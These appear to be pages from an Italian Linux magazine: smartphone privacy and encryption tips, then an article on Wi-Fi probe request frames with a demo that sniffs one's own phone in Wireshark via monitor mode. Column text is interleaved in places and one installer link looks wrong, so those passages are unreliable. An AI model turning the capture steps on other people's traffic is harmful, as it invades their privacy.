Comunicate in sicurezza
Ecco come usare il vostro smartphone in incognito
U
no dei migliori modi per proteggere
il telefono cellulare da qualsiasi tipo
di sorveglianza è usare la crittografia
end-to-end. C’è un numero crescente di applicazioni
e servizi che consentono di crittografare i dati
sul dispositivo prima di essere inviati e quindi
decifrati sul telefono del destinatario. La crittografia
non impedisce di memorizzare dei dati nella cache,
ma salvaguarda contro ogni tipo di spionaggio,
rendendo incomprensibili le informazioni a chiunque
non sia in possesso delle chiavi di decrittazione
corrette. Per iniziare la vostra campagna per
la privacy, è opportuno proteggere la navigazione
in Internet. Su Android, infatti, potete installare
una serie di componenti aggiuntivi per il browser.
Uno dei più popolari è Phony, che potrete utilizzare
per personalizzare lo user-agent del programma
di navigazione ed evitare che i siti rilevino che state
utilizzando un dispositivo mobile. C’è poi un add-on
che elimina tutti i cookie di un sito non appena
ne chiudete la pagina. Per un controllo più
completo, è comunque possibile utilizzare
CleanQuit, che rimuove tutte le informazioni sulla
sessione di navigazione precedente, tra cui anche
la cronologia di download e le preferenze. Se volete
raggiungere veramente l’anonimato, dovete però
utilizzare OrWeb (http://bit.ly/1eiYktj),
un browser preconfigurato per la navigazione
in incognito. Può sfruttare anche un plug-in
per mascherare il vostro dispositivo, consentire
il controllo dei cookie e impedire il caricamento
di contenuti Flash, il tutto senza mantenere traccia
della cronologia. Potete poi usare Orbot, che
in pratica è la versione di Tor per Android. Al primo
avvio, Orbot vi guiderà in una procedura passo
passo per la configurazione rapida. Se poi avete
un telefono con permessi di root, potrete attivare
L’App EncDroid di Android permette di creare
cartelle crittografate EncFS e in più le sincronizza
98
il transparent proxying, il quale direziona tutte
le applicazioni che si collegano al Web verso la rete
Tor. Per firmare e crittografare i messaggi di posta
elettronica su un dispositivo mobile, è necessaria
l’applicazione Android Privacy Guard (APG),
un’integrazione Open Source di OpenPGP. Avrete
quindi bisogno del client email K-9, che può
integrarsi perfettamente con APG. Al primo avvio
di K-9, dovrete configurarlo per collegarsi al server
di posta elettronica. Una volta fatto, lancerete APG
selezionando il pulsante del menu che vi permette
di gestire le chiavi private e quelle pubbliche.
Potrete quindi esportarle dal desktop e importarle
in APG. Una volta importate, K-9 permetterà
di firmare e crittografare i messaggi ogni volta che
scrivete una nuova email. Viceversa, vi permetterà
di decifrare i testi quando ne ricevete di criptati.
Se invece volete crittografare i messaggi istantanei,
dovete utilizzare l’app Open Source ChatSecure.
Questa utilizza il protocollo OTR per abilitare
sessioni di chat sicure su account XMPP. Utilizzando
quest’applicazione, potrete svolgere conversazioni
blindate con i vostri amici su reti popolari come Potete usare l’App Jitsi per lanciare
Google Hangout, Facebook e su ogni altro client videochiamate sicure
compatibile con OTR come Pidgin, Adium e Jitsi.
come RedPhone ha il compito di criptare
Vecchia scuola le chiamate effettuate da Internet. C’è anche
Un’altra forma di comunicazione testuale molto SilentPhone, sviluppato dallo stesso Phil
utilizzata è l’SMS. Anche se in costante Zimmerman che ha dato alla luce OpenPGP
diminuzione a causa dei prezzi e del continuo per la protezione delle email, che usa
nascere di servizi come WhatsApp e simili, viene il protocollo ZRPT per mettere al sicuro
ancora molto utilizzata. Potete crittografare gli le chiamate VoIP. L’app non è però gratuita,
SMS con TextSecure, che può rendere illeggibili ma richiede la sottoscrizione di un abbonamento
i messaggi memorizzati localmente sul telefono. per 10 dollari (7 euro circa). Entrambe
Tuttavia, per inviare messaggi crittografati le soluzioni citate fanno esattamente quello che
a un vostro contatto, questo deve avere installato dicono e permettono di crittografare le chiamate.
la stessa applicazione. Quando lanciate TextSecure Tuttavia, la loro maggiore limitazione risiede nella
per la prima volta, potrete criptare immediatamente necessità di far installare le stesse applicazioni
tutti i messaggi. A questo proposito, consigliamo anche sul dispositivo dei vostri contatti. In caso
di eliminare quelli in chiaro non appena vengono contrario, non sarete in grado di stabilire una
generate le versioni crittografate. Prima di inviare conversazione sicura. Il progetto Ostel si sta
SMS dovrete creare una connessione sicura con occupando proprio di risolvere questo problema.
il dispositivo del destinatario attraverso lo scambio Tramite lo standard noto come Open Source
di chiavi. TextSecure invierà quindi un messaggio Telephony Network (OSTN), utilizza protocolli
al vostro contatto, la cui applicazione risponderà liberi per creare canali di comunicazione vocali
subito con un ulteriore SMS, stabilendo così end-to-end crittografati. Il suo punto di forza sta
la connessione sicura. Da questo momento nel fatto che potrete connettervi con qualsiasi
in poi, siete liberi di inviare messaggi criptati. contatto che sta utilizzando un’applicazione
Molti di noi, per non dire la maggioranza, sfruttano capace di supportare OSTN. Per Android
le normali reti di telefonia mobile per inoltrare c’è già l’App CSipSimple, per iPhone trovate
e ricevere chiamate. Quello che forse non sapete Acrobits, mentre chi usa BlackBerry sfrutterà
è che esistono servizi in grado di creare canali PrivateGSM. Chi invece continua a servirsi
sicuri per contrastare qualsiasi tentativo di un PC, Jitsi è un programma cross-platform
di intercettare la conversazione. Un’applicazione che funziona su Linux, Windows e Mac.
 Protezione per il telefono

Mettetevi al sicuro
Chiudete porte e portelli per non far entrare nessuno

O
ltre a limitare il flusso di dati inviati
da applicazioni di terze parti e crittografare
tutte le varie forme di comunicazione,
dovrete anche proteggervi dal rischio di manomissioni
fisiche: furti o accessi non autorizzati. Se siete
veramente attenti alla privacy, dovreste almeno
utilizzare un’opzione per bloccare il telefono. Potete
limitare l’accesso tramite una password alfanumerica,
un comando vocale, oppure utilizzare una chiave
grafica, che consiste nel disegnare una forma
predefinita sul display dello smartphone. Se utilizzate
le schermate di blocco, dovreste preoccuparvi anche
Oltre alla cifratura, SSE può cancellare in modo
sicuro i file, così da evitare che qualcuno li recuperi
di disattivare i widget. Per farlo è però necessario
utilizzare un’applicazione di terze parti come
Lockscreen Policy, che adesso è integrata nella più
recente versione di Android. Il blocco del telefono,
però, non serve quando consegnate lo smartphone
a qualcuno senza che sia bloccato. A questo
proposito, potete utilizzare Screen Locker (http://
bit.ly/LRBttz), che consente di bloccare lo schermo
prima che il telefono passi di mano. L’applicazione
disabilita tutte le forme di input e impedisce agli utenti
di visualizzare qualcosa di diverso da ciò che
è presente al momento sul display. Ci sono poi
le applicazioni utili per impedire l’accesso alle app
tramite una password. Una di queste è Privacy
Master Free, che simula un falso crash del software
ogni volta che qualcuno tenta di avviarlo. Inoltre,
impedisce l’accesso alle aree chiave come Google
Play Store ed è in grado di bloccare il Task Manager
così come i collegamenti USB. AppLock è un’altra
applicazione che, insieme alla capacità di bloccare
l’accesso alle app, consente perfino di nascondere
foto e video. Inoltre, può impedire la modifica
non autorizzata delle impostazioni, come per esempio
quelle relative al Wi-Fi. Una delle migliori
caratteristiche di AppLock consiste nel creare
dei profili di blocco. Così facendo, potete generare
una lista di applicazioni che volete bloccare solo
quando siete in ufficio e un’altra quando invece
vi trovate in famiglia. Potete attivare i blocchi in base
al luogo (casa, ufficio, tempo libero), o seguendo
l’orario. Dal punto di vista della sicurezza,
l’applicazione riorganizza casualmente la vostra
tastiera numerica, così da impedire ad altri di carpire
le password seguendo il movimento delle dita.
AppLock, infine, si occulta all’interno del dispositivo,
così da non essere rilevata.
Criptate lo smartphone
La vostra attenzione per la privacy dovrebbe
poi portarvi a crittografare i dati direttamente
sul dispositivo attraverso la funzione integrata.
Tuttavia, in questo particolare processo, ci sono alcuni
svantaggi da valutare. In primo luogo la crittografia
è a senso unico, vale a dire che una volta attivata
non c’è alcun modo per disattivarla. In pratica,
se non volete più farne uso, dovrete ripristinare
il telefono perdendo così tutti i dati. Inoltre
è importante eseguire un backup prima di avviare
il processo, ma soprattutto fare in modo che durante
il criptaggio non si verifichino interruzioni di alcun
genere. In caso contrario, non sarete più in grado
di utilizzare lo smartphone. Prima di iniziare,
assicuratevi di aver impostato un PIN di blocco dello
schermo o in alternativa una password, che Android
utilizzerà come chiave di decrittazione. Per la crittografia,
andate in Impostazioni D Sicurezza D Esegui
crittografia telefono. D’ora in poi tutte le volte
che accenderete lo smartphone dovrete inserire
il PIN o la password. Se non volete crittografare
l’intero dispositivo, niente vi impedisce di rendere
illeggibili solo alcuni file. In questo frangente, una delle
migliori applicazioni è SSE Universal Encryption,
che permette di utilizzare tutti gli algoritmi di cifratura
più diffusi tra cui AES 256, Serpent 256 e Blowfish
256. L’app è composta da tre moduli: Password
Vault consente di memorizzare in modo sicuro
le password organizzandole in cartelle, Message
Encryptor crittografa i frammenti di testo, mentre
Encryptor File/Dir permette di scegliere qualsiasi file
memorizzato nel dispositivo per poi criptarlo.
CyanogenMod, invece, richiede un po’ di fatica
per essere installata, ma se prendete in prestito
un PC con Windows, potete risparmiare tempo
e fatica sfruttando il CyanogenMod Installer
(http://get.com). Gli appassionati di Software Libero
potrebbero però volere un’alternativa, che in questo
caso viene fornita da Replicant. Basandosi su
CyanogenMod, riesce a sostituire tutti i componenti
proprietari di Android con le loro controparti free.
Infine una notizia interessante: Silent Circle di Phil
Zimmerman ha stretto una partnership con il produttore
di smartphone Geeksphone, da cui sta per nascere
Blackphone, un dispositivo che sfrutterà PrivatOS
e avrà il compito di proteggere la vostra privacy.

Passate a un firmware di terze parti

Ogni anno, Google lancia una versione vanilla Android da scaricare, che nella
tradizione popolare è più comunemente conosciuta come AOSP. Molti
programmatori, dopo aver scaricato questa particolare release del sistema
operativo, la usano per creare la propria versione di Android. CyanogenMod,
per esempio, è una delle distribuzioni più popolari. Uno dei motivi alla base
della sua notorietà risiede nell’offrire il controllo completo del dispositivo,
liberandolo da ogni legame con Google, il provider telefonico e il produttore.
È inoltre opportuno ricordare che il team di CyanogenMod è sempre pronto
a fornire patch di sicurezza e a correggere i bug che vengono invece risolti
da Google solo nelle versioni successive di Android. Il firmware di terze
parti include Privacy Guard, che offre un miglior controllo sulle app e sulle
rispettive autorizzazioni. Le versioni più recenti dell’applicazione includono
anche la funzione AppOps, scritta da Google per Android 4.3.
Con questo strumento, gli utenti possono prevenire l’accesso ai dati da parte
delle singole applicazioni. L’ultima versione di CyanogenMod integra infine
l’app TextSecure SMS direttamente nel firmware.

99
 Dispositivi Mobili

Smartphone e
privacy col Wi-Fi
L’interfaccia Wi-Fi del vostro smartphone è sempre accesa?
Attenzione: la vostra privacy potrebbe essere a rischio...

A
gli albori dell’informatica, i computer erano 802.11. Lo standard, più volte revisionato nel corso
pensati per lavorare in splendida solitudine: anni (vedi il box Principali versioni dello standard
ogni computer costituiva una stazione 802.11 a pag 68) definisce, fra gli altri, i seguenti
di elaborazione isolata, senza alcuna connessione con aspetti di progetto delle reti:
gli altri. Questa concezione, tuttavia, fu rapidamente banda trasmissiva impiegata (suddivisa in canali,
superata, portando alla nascita delle prime reti: grazie ognuno caratterizzato dall’utilizzo di una diversa
al ricorso ad appositi cavi di collegamento (la cui frequenza di trasmissione);
tipologia e le cui capacità di trasmissione si sono tecniche di codifica dei dati;
rapidamente evolute nel corso degli anni), fu possibile struttura dei frame;
realizzare reti via via sempre più grandi, sino protocolli di comunicazione utilizzati.
ad abbracciare l’intero globo terrestre con la nascita In particolare, lo standard 802.11 stabilisce due
di Internet. Per qualche tempo, il binomio computer possibili modalità operative per le reti Wi-Fi:
e cavo di rete sembrò essere inscindibile, andando la modalità ad hoc, in cui un insieme di dispositivi
a sovvertire completamente il paradigma iniziale dotati di interfaccia di rete wireless (anche detti
delle macchine stand alone. Poi giunse il tempo stazioni mobili) realizzano una WLAN dedicata, priva
dei dispositivi mobili: dai notebook ai netbook, fino di interconnessioni con l’esterno;
ai moderni smartphone e tablet, il diffondersi di la modalità infrastruttura che, mediante il ricorso
apparecchiature in grado di operare senza richiedere ad apposite apparecchiature dette access point,
un collegamento costante alla rete elettrica determinò consente la connessione della rete wireless a reti
la necessità di affrancare il concetto di connessione cablate.
da quello di cavo. Fu così che nacquero le reti wireless È proprio quest’ultima la modalità su cui vogliamo
(anche dette WLAN, acronimo proprio di Wireless focalizzare la nostra attenzione, in quanto rappresenta
LAN, o reti Wi-Fi, da Wireless Fidelity), basate la soluzione tecnologica attualmente più utilizzata:
sull’utilizzo di onde elettromagnetiche e in grado dalle nostre abitazioni ai fast food, dagli aeroporti
di consentire effettivamente la connessione tra
dispositivi in assenza di cavi. Sebbene le dorsali di rete
continuino a basarsi su collegamenti cablati, a oggi la
L’autore diffusione delle reti Wi-Fi ha raggiunto livelli imponenti,
tanto che una larga fetta dei dispositivi in commercio
Maurizio Russo (in particolare quelli mobili) risulta dotata unicamente
Laureato in di schede di rete wireless.
Informatica presso
l’Università “La
Sapienza” di Roma,
Lo standard 802.11
con una tesi Di pari passo con la crescente diffusione delle reti
sperimentale sullo Wi-Fi è sorta l’esigenza di uniformare le modalità
stack TCP/IP del e i protocolli utilizzati per la comunicazione, al fine
kernel Linux, è un
di garantire la piena interoperabilità delle diverse
utente del pinguino
dal 2001. Nella sua implementazioni proposte dall’industria. Come già
carriera si è occupato accaduto in precedenza per le cosiddette reti
di formazione, “Ethernet” (vedi il box La famiglia 802), l’IEEE
sicurezza, (Institute of Electrical and Electronic Engineers, Fig 1),
networking,
uno dei più importanti enti di standardizzazione
progettazione e
sviluppo di software. nel campo delle reti, ha provveduto a realizzare un Fig 1: Il sito Web dell’Institute of Electrical and
apposito standard per le reti wireless, denominato Electronic Engineers

100
 Il nemico arriva dal Wi Fi
ai centri commerciali, dai ristoranti agli hotel, ogni
giorno sperimentiamo l’utilizzo di una rete wireless
operante in modalità infrastruttura. Per l’utente si
tratta di un procedimento semplice e immediato, che
si snoda attraverso le seguenti fasi:
1 scansione delle reti Wi-Fi disponibili nei diversi

canali (data la loro natura “eterea”, in un singolo luogo

potrebbero coesistere più reti contemporaneamente,
magari gestite da strutture differenti);
2 individuazione della rete d’interesse, attraverso

il “nome” a questa associato (il cosiddetto SSID,

acronimo di Service Set Identifier);
3 connessione alla rete, previo inserimento della

password di protezione.
Dietro queste attività dall’apparenza banale si
nascondono una serie di interazioni tra il terminale
mobile e l’access point della rete di riferimento, tese
a stabilire un legame (in gergo un’associazione) tra
i due dispositivi. La creazione di una connessione Wi-Fi
comporta infatti la generazione di un fitto traffico tra
la stazione mobile e l’access point, le cui specifiche
sono regolamentate dallo standard 802.11.
Esaminiamo, per esempio, le modalità di scansione
delle reti wireless disponibili, operazione che
costituisce la prima delle tre “fasi” in cui abbiamo
suddiviso “l’esperienza utente” relativa al collegamento
a una WLAN. Il nome “scansione” potrebbe indurci
a pensare a un’attività di tipo passivo, basato
sull’ascolto del traffico di rete: non a caso lo standard
802.11 prevede la possibilità che ogni access point invii
periodicamente nell’etere degli appositi messaggi,
detti beacon frame, contenenti tutte le informazioni
necessarie per la connessione alla propria WLAN. Negli
anni, tuttavia, questa funzionalità è stata sfruttata per
la conduzione di attacchi contro le reti wireless
(non ultimo il furto di connettività, agevolata da una
maggiore visibilità della WLAN), portando un numero
sempre maggiore di amministratori di rete
a disabilitare sui propri access point l’invio dei beacon
frame. A complicare ulteriormente lo scenario, inoltre,
Fig 2: Un esempio di frame di tipo Probe Request
c’è il fatto che l’ascolto degli eventuali beacon frame
dovrebbe essere condotto dalla stazione mobile
in maniera sequenziale, scandagliando tutti i canali
disponibili e permanendo su ciascuno di essi per
un periodo di tempo congruo, al fine di minimizzare
il rischio di non rilevare una rete potenzialmente
d’interesse. Questa operazione può comportare tempi
di attesa apprezzabili, che mal si conciliano con la
necessità di ottenere la connessione in tempi ridotti.
Per risolvere tale problematica, è stata introdotta la
possibilità di eseguire una scansione attiva delle reti
Wi-Fi, in cui la stazione mobile:
invia in broadcast, sul primo canale disponibile,
un apposito frame detto Probe request;
attende per un certo tempo (inferiore a quello
necessario per un’esaustiva scansione passiva)
le eventuali risposte degli access point (fornite per
mezzo di frame di tipo Probe response), avendo cura
di tenere traccia delle relative reti;
terminato il tempo d’attesa predefinito, si sposta

La famiglia 802
L’attività dell’Institute of Electrical and Electronic Engineers
(IEEE) nell’ambito delle reti locali ha portato allo sviluppo
di numerosi standard, raccolti sotto il nome di famiglia 802.
Tra questi possiamo ricordare:
lo standard 802.3, denominato CSMA/CD ma comunemente
indicato con il nome di Ethernet;
lo standard 802.5, che definisce le caratteristiche di una LAN
di tipo token ring ;
lo standard 802.11, relativo alle WLAN.
Nell’ambito dell’architettura definita dal modello OSI (acronimo di
Open System Interconnection , un modello di riferimento realizzato
dall’International Standard Organization, in grado di fornire una
base di partenza per lo sviluppo di standard di rete), questi
standard definiscono le caratteristiche delle reti a livello:
fisico (per esempio specificando il range di tensioni utilizzabili
per indicare i valori logici di 0 e 1, le modalità per la trasmissione
contemporanea in due direzioni, le caratteristiche degli eventuali
connettori di rete, ecc.);
data link (che costituisce un’astrazione di quanto avviene al
livello precedente, con lo scopo di rilevare, superare e prevenire
tutti i possibili errori di trasmissione potenzialmente verificabili
a livello fisico).
Tutti gli standard della famiglia 802, pur differenziandosi
notevolmente per quanto attiene gli aspetti fisici della
trasmissione, presentano un livello data link con forti analogie.
Tale livello è infatti suddiviso in due sottolivelli, denominati
Medium Access Control (o MAC MAC a cui spetta il compito di
disciplinare l’accesso al canale trasmissivo condiviso) e Logical
Link Control (o LLC, al quale è affidato il compito di fare
da interfaccia per i livelli superiori): se il sottolivello MAC risulta,
a pari del livello fisico, fortemente legato alla tipologia di rete,
il sottolivello LLC risulta invece unico per tutti gli standard citati,
uniformandone di fatto l’interfaccia verso i livelli superiori
e semplificandone la realizzazione.

101
 Dispositivi Mobili
Principali versioni dello standard 802.11
Lo standard 802.11 ha conosciuto, sin dalla sua nascita nel 1997,
numerose evoluzioni, ciascuna codificata in una determinata versione.
Tra queste ricordiamo:
802.11b: pubblicato nel 1999, questa versione si caratterizza
per l’utilizzo di frequenze nell’intorno di 2,4 GHz, e per una velocità
massima di trasmissione teorica di 11 Mbit/s, equivalente
a un troughput reale, per il protocollo TCP, di circa 5,9 Mbit/s.
Ha il merito di aver introdotto il meccanismo del Carrier Sense Multiple
Access with Collision Avoidance, tuttora utilizzato per regolare l’accesso
delle stazioni mobili al canale trasmissivo condiviso e per minimizzarne
le inevitabili collisioni;
802.11a: ratificato nel 2001, sebbene sia stato approvato già nel 1999,
al canale successivo, sul quale reitera le medesime
operazioni.
Al termine della scansione, quindi, il dispositivo ha
collezionato i dati salienti delle reti presenti sul posto,
ed è pertanto in grado di fornirne l’elenco all’utente,
per la successiva connessione alla WLAN d’interesse.
Questa, tuttavia, verrà effettivamente instaurata solo
a seguito dello scambio di ulteriori pacchetti tra
l’access point e la stazione mobile ossia:
una serie di Authentication frame volti
ad appurare l’identità della stazione mobile;
una richiesta di associazione, inviata dalla stazione
mobile all’access point mediante un frame di tipo
Association request;
un frame di tipo Association response, con cui
l’access point comunica l’accettazione (o il rifiuto)
del dispositivo mobile.
Probe Request
e Probe Response
Appurato il livello di complessità del protocollo per
l’instaurazione di una connessione Wi-Fi secondo
lo standard 802.11, torniamo a soffermarci sul primo
dei frame adoperati in questo processo, il frame di tipo
Fig 3: Il sito Web di Wireshark
102
adopera frequenze nell’intorno dei 5 GHz, per una velocità di
trasmissione massima pari, a livello teorico, a 54 Mbit/s (equivalente
a un troughput effettivo di circa 20 Mbit/s);
802.11g: risalente al 2003, presenta un mix di caratteristiche delle
due versioni precedenti (frequenze nell’intorno dei 2,4 GHz, velocità di
trasmissione massima pari, a livello teorico, a 54 Mbit/s, corrispondente
a un troughput effettivo di circa 30 Mbit/s). Questa versione
è retrocompatibile con la 802.11b: in altri termini, le schede conformi
alla versione 802.11g sono in grado di operare anche in reti 802.11b;
802.11n: pubblicato nel 2009, introduce il concetto di “dual band”:
supporta infatti sia le frequenze nell’interno dei 2,4 GHz sia quelle
nell’intorno dei 5 GHz.
Probe Request. Posto dopo l’header di livello Data
Link, il frame è caratterizzato da campi opzionali
e campi obbligatori, tra i quali ricordiamo (Fig 2):
il campo SSID, contenente il SSID della rete alla
quale la stazione desidera connettersi (nel qual caso
si parla di direct probe request, in quanto
la stazione effettua una ricerca specifica di una
determinata rete), o il valore zero se il dispositivo
sta effettuando una scansione attiva di tutte le reti
disponibili (null probe request);
il campo Supported Rates, che indica fino a un
massimo di 8 valori relativi alle capacità trasmissive
(velocità di trasferimento massima in Mbit/sec)
supportate dalla stazione;
il campo Extended Support Rates, utilizzato nel
caso in cui le capacità trasmissive della stazione
eccedessero gli otto valori disponibili per il campo
precedente;
il campo Vendor Specific, contenente informazioni
dipendenti dal dispositivo e dalle scelte tecnologiche
operate dal costruttore.
In particolare, oltre al campo SSID (il cui valore come
visto determina il tipo di scansione effettuata, diretta
o rivolta a tutte le reti disponibili), rivestono un
compito rilevante anche i campi Supported Rates
ed Extended Support Rates: prima di rispondere
a un frame di tipo Probe Request, infatti, l’access
point confronta le proprie capacità trasmissive con
quelle della stazione, provvedendo all’invio del frame
di risposta solo qualora queste risultassero
compatibili. In altri termini, l’access point invierà alla
stazione richiedente un frame di Probe Response
dopo aver verificato l’esistenza, all’interno dei citati
campi, di almeno una velocità trasmissiva compatibile
con quelle da esso stesso supportate: non avrebbe
senso avviare l’iter di autenticazione e associazione
di una stazione mobile troppo veloce (o troppo lenta)
rispetto all’access point, in quanto il colloquio tra i due
dispositivi sarebbe comunque impossibile. Vediamo,
per completezza, alcuni tra i principali campi del frame
di tipo Probe Response, anch’essi suddivisi tra campi
opzionali e obbligatori:
il campo Timestamp, contenente la marcatura
temporale del frame;
il campo SSID, che specifica il SSID della rete a cui

Fig 4: Grazie a questo elemento del pannello, abilitare
la scheda Wi-Fi di un PC è davvero semplice...
appartiene l’access point;
il campo Supported Rates, che come per il frame
di Probe Request indica fino a un massimo di 8 valori
relativi alle capacità trasmissive supportate dall’access
point;
il campo Extended Support Rates utilizzato,
in analogia con quanto avviene per i frame di Probe
Request, qualora le capacità trasmissive dell’access
point eccedessero gli otto valori disponibili per
il campo precedente;
il campo Vendor Specific, anche in questo caso
utilizzato per immagazzinare informazioni stabilite
dal costruttore.
Una dimostrazione dal vivo
L’analisi sin qui condotta ci ha consentito di capire
comprendere le principali interazioni tra stazioni
mobili e access point nella fase iniziale della
connessione: in particolare, abbiamo approfondito il
ruolo dei frame di Probe Request e Probe Response,
di cui abbiamo esaminato i campi salienti. È tempo
di passare dalla teoria alla pratica, verificando
le caratteristiche e i contenuti di questi frame in uno
scenario reale. A tal fine, è sufficiente disporre di:
un portatile (o un desktop) equipaggiato con scheda
di rete Wi-Fi e sistema operativo GNU/Linux;
uno smartphone con sistema operativo Android.
Si tratta di due requisiti il cui soddisfacimento non
dovrebbe costituire un ostacolo insormontabile,
tantomeno per un lettore di Linux Pro! La prima
operazione da compiere consiste nell’installazione,
sul PC, di Wireshark (Fig 3), uno sniffer molto potente
in grado di ascoltare anche il traffico transitante sulle
schede Wi-Fi. Nelle distribuizioni debian-based, ciò
è possibile mediante il comando
# sudo apt-get install wireshark
Terminata l’installazione, possiamo dedicarci
all’attivazione della scheda di rete Wi-Fi, operazione
Il nemico arriva dal Wi Fi
Fig 5: L’output del comando iwconfig
necessaria per sniffare il traffico che successivamente
produrremo con il nostro smartphone. Per motivi di
sicurezza (e per massimizzare il risparmio energetico),
in molti computer (e in particolare nei notebook)
l’interfaccia Wi-Fi risulta disabilitata al caricamento
del sistema operativo e richiede un’attivazione
esplicita da parte dell’utente, mediante uno switch
hardware (un interruttore oppure un tasto della
tastiera) o un software ad hoc, come per esempio
il plug-in Network connections disponibile nelle
distribuzioni Ubuntu e derivate (Fig 4). Nel nostro
caso, tuttavia, non siamo interessati a una generica
attivazione dell’interfaccia, ma a una precisa
configurazione di quest’ultima, che andremo
a impostare mediante un tool apposito da riga
di comando, iwconfig. Utilizziamo il comando privo
di argomenti per conoscere il nome (wlan0, nel nostro
caso) dell’interfaccia wireless installata sul computer.
Come si evince dalla Fig 5, iwconfig non si limita
a indicare il nome associato alla scheda Wi-Fi,
ma ne specifica nel dettaglio le caratteristiche salienti,
tra cui:
la potenza di trasmissione in dB (campo Tx-Power,
nel nostro esempio posto a off in quanto l’interfaccia
risulta disabilitata);
le versioni dello standard supportate (nell’esempio,
802.11 bgn);
l’opzione relativa alla modalità operativa selezionata
(campo Mode).
Quest’ultima proprietà ricopre nel nostro caso un ruolo
fondamentale: richiamando quanto affermato nel
paragrafo Lo standard 802.11 esistono infatti diverse
modalità operative, in ragione delle possibili tipologie
di reti Wi-Fi. Le opzioni possibili per il campo Mode,
tuttavia, non ricalcano fedelmente la suddivisione
operata in precedenza (modalità operativa ad hoc
e modalità operativa infrastruttura), in quanto
contemplano per la modalità infrastruttura una
molteplicità di possibili valori, in ragione del ruolo
ricoperto dal dispositivo nella rete (semplice stazione
mobile, ripetitore oppure vero e proprio access point).
Inoltre, in aggiunta alla già nota modalità “ad-hoc”,
iwconfig consente anche l’impostazione della
cosiddetta modalità monitor: in questo caso, non
sussiste alcuna associazione tra il dispositivo e una
103
 Dispositivi Mobili
Fig 6: In alcune architetture, l’attivazione manuale della scheda Wi-Fi
potrebbe fallire a causa di questo errore
Fig 7: Ecco come garantire il successo dell’operazione di attivazione
manuale della scheda Wi-Fi
rete Wi-Fi, ma l’interfaccia wireless viene impostata
affinché controlli (in maniera passiva) tutti i pacchetti
transitanti nell’etere su tutte le frequenze supportate.
Se vogliamo effettuare lo sniffing dei pacchetti
wireless inviati dal nostro smartphone, la modalità
operativa da utilizzare non può che essere questa...
possiamo impostarla facendo ricorso, nuovamente,
al comando iwconfig:
sudo iwconfig wlan0 mode monitor
Solo in seguito all’impostazione della modalità
monitor è possibile procedere all’attivazione
dell’interfaccia. Tale operazione deve avvenire in
maniera “pulita”, senza alcuna configurazione
aggiuntiva (che viceversa potrebbe imporre una
modalità operativa differente rispetto a quella da noi
Fig 8: La schermata principale di Wireshark, ove si può scegliere
l’interfaccia sulla quale effettuare lo sniffing
104
desiderata): a tal fine, possiamo ricorrere al
programma ifconfig, da invocare con la sintassi
sudo ifconfig wlan0 up
In alcuni sistemi, tuttavia, questa operazione potrebbe
fallire a causa dell’errore (Fig 6):
SIOCSIFFLAGS: Operazione non possibile a causa di
un RF-kill
In tal caso è necessario eseguire dapprima il comando
(Fig 7):
sudo rfkill unblock all
per poi passare a
ifconfig wlan0 up
Finalmente siamo pronti a vedere sul campo i frame
di tipo “Probe Request” inviati dal nostro
smartphone. A tal fine, avviamo Wireshark
e selezioniamo, dalla schermata iniziale, l’interfaccia
wlan0 (Fig 8). La successiva selezione, dal menu
a tendina, delle voci Capture D Start determinerà
l’avvio dell’attività di sniffing: per terminare l’ascolto
della rete, invece, è sufficiente selezionare le voci
Capture D Stop. A questo punto possiamo recarci
in un luogo isolato, privo di interferenze provenienti da
eventuali WLAN (che non ci interessano, né sarebbe
corretto ascoltare), e attivare l’interfaccia Wi-Fi dello
smartphone. Qualora optassimo per effettuare
l’esperimento in casa, sarebbe bene disabilitare
temporaneamente le eventuali reti wireless sotto la
nostra diretta gestione: questa accortezza ci consente
infatti di semplificare la lettura del traffico prodotto
dal nostro dispositivo. Qualora ciò non fosse possibile,
e a scansione finita (alcuni secondi di sniffing
dovrebbero essere sufficienti a catturare i pacchetti
desiderati) dovessimo trovarci alle prese con
numerosi pacchetti originati da differenti sorgenti,
potremmo comunque ovviare al problema adoperando
l’articolato sistema di filtraggio che Wireshark ci offre.
Possiamo infatti isolare i frame inviati dal nostro
smartphone imponendo un filtro che li identifichi
univocamente, con la conseguenza di impedire
Fig 9: Nel modello OSI, il livello Data Link è il primo
livello immediatamente successivo a quello fisico
 Il nemico arriva dal Wi Fi

Fig 10: Impostando un filtro sull’indirizzo MAC

dell’interfaccia wireless, è possibile distinguere con
semplicità i pacchetti inviati dal nostro smartphone

la visualizzazione del traffico restante. Trattandosi Fig 11: Il campo Info ci consente di determinare con immediatezza se il
di frame di livello data link (Fig 9), il criterio di frame esaminato è di tipo Probe Request
filtraggio non può che essere costituito dall’indirizzo
MAC ( Medium Access Control ). Tale indirizzo
è associato in maniera immutabile all’interfaccia Wi-Fi
del telefono, e nei sistemi Android può essere
recuperato mediante il percorso Impostazioni D
Wi-Fi D Avanzate. Acquisita questa informazione,
torniamo a Wireshark. La schermata principale dello
sniffer presenta un’apposita barra, recante non a caso
l’etichetta Filter, ove è possibile inserire il filtro
da imporre alla visualizzazione dei pacchetti.
Nel nostro caso, tale filtro è pari a:
wlan.addr==00:1e:ad:XX:XX:XX
dove 00:1e:ad:XX:XX:XX è l’indirizzo MAC rilevato
sullo smartphone, e la stringa che lo precede impone
che quest’ultimo coincida con l’indirizzo del mittente
dei frame. La successiva pressione del tasto Invio
determina l’applicazione del filtro (Fig 10),
rimuovendo dall’elenco tutti i pacchetti non inviati
dal nostro smartphone. Non ci resta che selezionare,
all’interno dei frame mostrati a video, un frame
di Probe Request: a tal fine è sufficiente affidarsi
a quanto visualizzato da Wireshark nel campo Info Fig 12: Un frame di tipo Probe Request dissezionato mediante Wireshark:
(Fig 11). L’operazione di selezione di uno dei frame qui vediamo l’header di livello Data Link
di Probe Request determina la visualizzazione, nel
riquadro centrale dell’interfaccia di Wireshark, dei
suoi contenuti, distinti dallo sniffer in quattro sezioni. entrambi all’indirizzo di broadcast ff:ff:ff:ff:ff:ff;
Quelle di nostro interesse sono le ultime due: Transmitter Address e Source Address, entrambi
la sezione denominata da Wireshark IEEE 802.11 coincidenti con l’indirizzo MAC del nostro
Probe Request, coincidente con l’header di livello smartphone.
Data Link del frame; Dall’analisi di queste informazioni possiamo infatti
la sezione denominata IEEE 802.11 wireless LAN dedurre che il frame:
management frame, al cui interno sono mostrati non ha un destinatario preciso, ma è rivolto a tutti
i contenuti veri e propri del frame di tipo Probe i potenziali destinatari in ascolto nell’area;
Request. è associabile, senza alcuna possibilità di equivoco,
Esplodendo la prima sezione (è sufficiente un click al nostro smartphone, grazie all’identificazione
sulla freccia posta sulla sinistra del nome della dell’indirizzo MAC sorgente con l’indirizzo MAC
